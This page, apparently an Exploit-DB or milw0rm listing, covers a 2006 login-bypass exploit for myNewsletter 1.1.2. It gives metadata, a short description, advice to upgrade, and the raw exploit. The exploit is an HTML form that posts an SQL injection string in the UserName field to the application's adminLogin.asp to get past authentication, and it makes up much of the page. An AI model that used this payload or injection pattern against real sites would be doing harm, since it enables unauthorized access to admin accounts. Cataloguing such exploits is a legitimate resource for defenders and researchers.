header-logo
Suggest Exploit
vendor:
myNewsletter
by:
FarhadKey
7,5
CVSS
HIGH
Login Bypass
287
CWE
Product Name: myNewsletter
Affected Version From: 1.1.2
Affected Version To: 1.1.2
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

KAPDA.ir — myNewsletter <= 1.1.2 Login bypass exploit

A login bypass vulnerability exists in myNewsletter version 1.1.2. An attacker can exploit this vulnerability by changing the action in the source code and submitting it. This will allow the attacker to bypass the authentication process and gain access to the application.

Mitigation:

Upgrade to the latest version of myNewsletter.
Source

Exploit-DB raw data:

<!-- orginal advisory : http://www.kapda.ir/advisory-340.html -->
<html><center><h4>KAPDA.ir --- myNewsletter <= 1.1.2 Login bypass exploit</h4><br>change action in source and then submit
</center><form name="adminLogin" method="post" action="http://site/newsletter/adminLogin.asp">
<input type="hidden" name="UserName" value="<!--'union select 1 from Newsletter_Admin where ''='">
<input type="hidden" name="Password" value="1">
<center><br><input type="submit" name="Submit" value="Login"></center><br><br>
<!-- Discovered and coded by FarhadKey / email : farhadkey [aT} kapda {D0T} net -->
<center><a href="http://www.kapda.ir">www.kapda.ir</a></center>
</form>
</html>

# milw0rm.com [2006-06-06]